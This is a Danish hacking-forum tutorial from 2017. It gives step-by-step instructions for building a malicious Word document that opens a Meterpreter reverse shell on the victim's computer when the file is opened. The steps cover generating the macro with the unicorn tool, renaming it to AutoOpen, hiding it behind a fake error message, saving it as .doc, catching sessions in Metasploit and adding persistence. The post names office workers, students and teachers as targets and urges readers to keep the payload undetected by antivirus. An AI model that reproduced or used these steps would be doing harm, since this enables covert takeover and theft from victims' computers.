01-03-2017, 21:53
Hehe... Så kom der en lille sjov tutorial...
Beskrivelse:
I den følgende Tutorial vil du komme til at arbejde med Word Macros (RATs).
Denne metode vil give dig fuld adgang til ofrets computer.
Den måde denne exploit fungere på er, at når en person åbner Word-filen du har sendt, så vil ofrets computer automatisk køre din fil.
Denne metode er 95% FUD. Der er nogle få, der opdager denne RAT, men de færreste.
Word dokumentet lukker med en fejl besked "The document appears to be made on an older version of Microsoft.
Please have the creator save to a newer and supported format.", når det bliver åbnet. Dette kan dog laves om, hvis du vil.
Hvad du skal bruge:
Er der noget jeg kan gøre bedre, vil jeg også meget gerne vide det - har du brug for hjælp til noget, eller har du nogle spørgsmål, så er du velkommen til at poste det i kommentar.
Lad for gudsskyld være med at bruge virustotal... Vi vil jo gerne holde den undetected... :)
Jeg valgte at lave denne tutorial, fordi jeg tænke den kunne være sjov og effektiv - desuden er den ikke set, så meget (førhen var den meget populær), men nu kan den også bruges i Word 2016, hvor det førhen var de ældre versioner.
- TheHacker, ude
Beskrivelse:
I den følgende Tutorial vil du komme til at arbejde med Word Macros (RATs).
Denne metode vil give dig fuld adgang til ofrets computer.
Den måde denne exploit fungere på er, at når en person åbner Word-filen du har sendt, så vil ofrets computer automatisk køre din fil.
Denne metode er 95% FUD. Der er nogle få, der opdager denne RAT, men de færreste.
Word dokumentet lukker med en fejl besked "The document appears to be made on an older version of Microsoft.
Please have the creator save to a newer and supported format.", når det bliver åbnet. Dette kan dog laves om, hvis du vil.
Hvad du skal bruge:
- Word 2016 (kan crackes, lidt ligegyldigt) eller hvilket som helst Microsoft Dokument fil
- Kali Linux (hvis det er vmware/virtuelbox, så skal den være bridged)
- Metasploit basic viden
- Hjerne
- Viden
- Hovedsageligt kontor brugere, elever, skoler, lærere
- Word brugere
- Tænd din kali linux
- Skriv apt-get install git, dette vil installere git, som bla. kan bruges til at hente github repositories
- Skriv apt-get install python, for at installere python
- Herefter skal du hente unicorn, det gør du ved at skrive git clone https://github.com/trustedsec/unicorn.git
- Nu skal vi ind hvor unicorn er blevet hentet. Det gør du ved at skrive cd unicorn
- Nu kan du skrive python unicorn.py ved, at skrive dette kan du, se hvad du kan bruge scriptet til.
- Du skal nu finde din IP på sider som whatismyip, canyouseeme og eller hvilken som helst anden. Søg blot efter "find my ip" på google.
Jeg anbefaler dog canyouseeme, da vi kommer til at bruge den senere.
Nu skal du sørge for at din port er portforwarded (håber jeg, du ved hvordan)
- Skriv nu python unicorn.py windows/meterpreter/reverse_tcp <din ip> <din valgte port> macro
Du kan nok genkende windows/meterpreter/reverse_tcp fra metasploit.
- Nu opretter den en fil "powershell_attack.txt" her i ligger din macro kode. Den kommer vi til at bruge senere.
- Du kan se, du kan bruge msfconsole -r unicorn.rc for at den automatisk kører din payload i metasploit, dog skal vi lige ændre noget.
Skriv leafpad unicorn.rc og ændre LHOST til din inet adresse. Denne kan findes ved at skrive ifconfig i terminalen.
Grunden til, at vi gør det, er så vi kan listen scriptet på din computer. Du kan ikke bruge den optimalt, hvis du ikke ændre det,
fordi den forsøger at forbinde til din ip, i stedet for din inet adresse.
Jeg har lige opdaget, at den nye version af unicorn har en fejl, der gør, at du også skal ændre LPORT.
LPORT skal ændres til den port, du har portforwarded.
- Åben nu word på din egen computer og opret et dokument,
- Kopier indeholdet fra powershell_attack.txt (leafpad powershell_attack.txt)
- Gå nu ind til dit word dokument igen og tryk under Makroer i: "Dokument (dokument)"--> Herefter Vis --> Makroer --> Opret --> Under Project (Dok1) vælger du "ThisDocument" --> sæt herefter hele powershell scriptet ind.
- Ændre
Citer: Sub Auto_Open()
Dim gEmssmj
til AutoOpen, det vil sige uden _
- Herefter ændre i det, som du vil. Du kan f.eks. fjerne
Citer:Dim title As String
title = "Microsoft Corrupt Document"
Dim msg As String
Dim intResponse As Integer
msg = "The document appears to be made on an older version of Microsoft.
Please have the creator save to a newer and supported format."
intResponse = MsgBox(msg, 16, title)
Application.Quit
fra scriptet for at undgå den lukker. Du kan også ændre teksten af fejlbeskeden, hvis du vil.
- Nu kan du vælge at skrive noget i word dokumentet, hvis du vil.
- Vi skal nu gemme word dokumentet (på en speciel måde), gå ind under Filer --> Gem som --> Gennemse (og vælg, hvor du vil gemme den) --> Under filtype vælger du "Word 97 - 2003-dokumenter (*.doc)"´
- Tryk nu gem
- Gå tilbage til din kali linux og kør msfconsole -r unicorn.rc og vent på at den er færdig, hvor der står (
- Starting the payload handler...).
- Prøv nu at åbne dokumentet på din computer (det er sikkert, bare rolig) og se om du kan se noget i din terminal. Hvis du har gjort alt rigtigt, skal der gerne stå (Meterpreter session 1 opened )
- Nu kan du vælge Sessionen ved, at skrive sessions, nu kan du se en liste over alle dine ofre (i dette tilfælde, dig). Vælg din session, ved at skrive sessions -i 1, så vil du automatisk blive connected til den valgte session.
- Skriv nu help for, at se hvad du kan (generelle metasploit ting)
- Hvis du vil have den til at starte op med computeren, så vil nogle antivirus (ret mange), opdage det. Du kan dog prøve ved at skrive run persistence
Er der noget jeg kan gøre bedre, vil jeg også meget gerne vide det - har du brug for hjælp til noget, eller har du nogle spørgsmål, så er du velkommen til at poste det i kommentar.
Lad for gudsskyld være med at bruge virustotal... Vi vil jo gerne holde den undetected... :)
Jeg valgte at lave denne tutorial, fordi jeg tænke den kunne være sjov og effektiv - desuden er den ikke set, så meget (førhen var den meget populær), men nu kan den også bruges i Word 2016, hvor det førhen var de ældre versioner.
- TheHacker, ude